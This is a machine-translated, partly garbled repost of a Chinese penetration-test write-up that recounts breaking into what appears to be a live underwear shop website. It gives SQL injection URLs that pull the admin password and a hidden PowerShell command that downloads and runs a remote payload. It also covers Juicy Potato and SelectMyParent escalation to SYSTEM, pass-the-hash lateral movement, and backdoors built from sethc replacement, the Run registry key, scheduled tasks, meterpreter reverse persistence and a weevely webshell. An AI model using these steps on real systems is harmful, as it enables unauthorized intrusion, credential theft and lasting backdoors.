Title: Remember a penetration test for underwear websites

This station is really big, no, this station is really round.php station can be tested casually

One injection

Because it can only read 32 bits, it uses substring to read separately

https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select

password from admin limit 1,1),0x7e))%20#

https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select

password from admin limit 1,1),30,35),0x7e))%20#

It feels comfortable, now you can go in and choose underwear openly

0x02 Take the shell and see robots.txt

inurl:a.com admin

Entering the background, I found that it was ECSHOP. Here, the file was changed to image bypassed.

seems to be reset

Here I found that SQL statements can be executed and there is an absolute path leak

ok Just say it, write a sentence

0x03 License The permission is a little low

There is no other way to use mysql.

Try to increase mysql rights

Except for the directory that cannot be uploaded, all other conditions are met, so when I didn't say it, go to cs, powershell online

Use Juicy Potato here for details. Please refer to the article of Sanhao Students. Choose any CLSID you want. Link

Then we are executing powershell with system permissions

shell style.exe -p 'powershell.exe -nop -w hidden -c \'IEX ((new-object net.webclient).downloadstring('powershell address'))\'' -c {e60687f7-01a1-40aa-86ac-db1cbf673334} Remember to escape the double quotes here

0x04 Horizontal penetration is the working group environment, scan out 0.9 and it is also a web. Here is a hash pass and it is directly transferred to catch the hash. Currently, there are the following accounts

wiseadmin shopaccount mysql wiseadmin filetransfer demoadmin

WDAGUtilityAccount

Ordinary hash delivery--

A demo that should be a web, and then 0.7 may be a database server

All admin permissions are available. If you want to get the system, you can use SelectMyParent. In fact, it is J to set the child process of the system process in the new process. Here we use the Cs horse, first check the pid of winlogon.exe

You can see that it is 500

Then upload our system.exe and execute shell SelectMyParent.exe system.exe 500

This step is actually to make up the number of words, hahahaha

0x05: The permissions are maintained here and the local test is taken

Sticky key backdoor Press "Shift" 5 times in succession on Windows to call up sticky keys

The sticky key refers to a shortcut key used in computers, designed for people who have difficulty pressing two or more keys at the same time. The main function of sticky bonds is to facilitate the combination of Shift and other keys. The sticky key can be pressed first (such as shift) and then the other key, instead of pressing two keys at the same time, which is convenient for some people who cannot press multiple keys at the same time due to physical reasons. A general computer will have a sticky key prompt when pressing shift five times.

Use the following command

cd windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe sethc.exe If the target machine is winvista or above, that is, the system that comes out of winvista later, modifying sethc will prompt that trustedinstaller permission is required, so if you want to continue, you need to modify the owner to Administrator and modify its permissions:

Then modify it to full control

Now we press shift 5 times in a row and a system permission cmd pops up

Register Injection Backdoor

Under normal user permissions, the attacker will write the backdoor program or script path that needs to be executed to the registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

The key value can be set arbitrarily, or the startup item can be added directly by executing the following command.

'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v

test /t REG_SZ /d 'C:\shell.exe' When the administrator logs back into the system, the backdoor program will be executed

Backdoor of plan tasks

Command :schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo Commands above will execute shell.exe once an hour, and use the at command instead of schtasks on systems such as win7 and below.

Meterpreter backdoor

meterpreter run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A

Automatically start a matching

exploit/multi/handler to connect to the proxy -L If %TEMP% is not used, the location of the payload is written in the target host.

-P payload usage, default is windows/meterpreter/reverse_tcp.

-S automatically starts the Trojan as a service (with SYSTEM permissions)

-T Alternate executable template to use

-U The Trojan is automatically started when the user logs in

-X The Trojan is automatically started when the system boots

-h This Help Menu

-i Time interval between each connection attempt (seconds)

-p The port the system running Metasploit is listening on

-r IP of the system running Metasploit listening to the connection

The disadvantage is that it is easy to be detected by antivirus software, and then it creates a new vbs file on the target machine, and then automatically starts it every time.web backdoor, you can use weevely to generate a shell.php here to test.

Put the file into the server directory and execute it

weevely http://192.168.220.1/shell.phpshell can help view the help

audit.etcpasswd | Enumerate /etc/passwd audit.userfiles | List files with permissions under user/home audit.mapwebfiles | Enumerate URL links of any Web site shell.php | Write php file shell.sh | Write system script system.info | Collect system information find.suidsgid | Find SUID/SGID files and directories find.perms | Find permissions readable/write/executable files and directories backdoor.tcp | TCP port backdoor backdoor.reversetcp | rebound TCP connection bruteforce.sql | Blast specified database username and password bruteforce.sqlusers | Blast all database user passwords file.upload | Upload local file file.upload2web | Upload binary/ASCII files to target site folder and enumerate URL file.enum | Enumeration of remote files in written form in the local vocabulary file.read | Read file file.rm | Delete file file.check | Check the status of remote files (md5 value, size, permissions, etc.) file.download | Download remote binary/ASCII files to local sql.console | Start SQL console sql.dump | Backup database, i.e. de-limiting net.scan | Port scan net.phpproxy | Install remote php proxy net.ifaces | Display remote host network interface information net.proxy | Install the tunnel communication agent to execute some windows commands

Execute the built-in command

Reprinted in the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247485826idx=2sn=8f11b7cc12f6c5dfb5eeeeb316f14f460chksm=ce67a31bf9102a0d704877584dc3c49141a376cc1b35c0659f3ae72baa7e77e6de7e0f916db5scene=21#wechat_redirect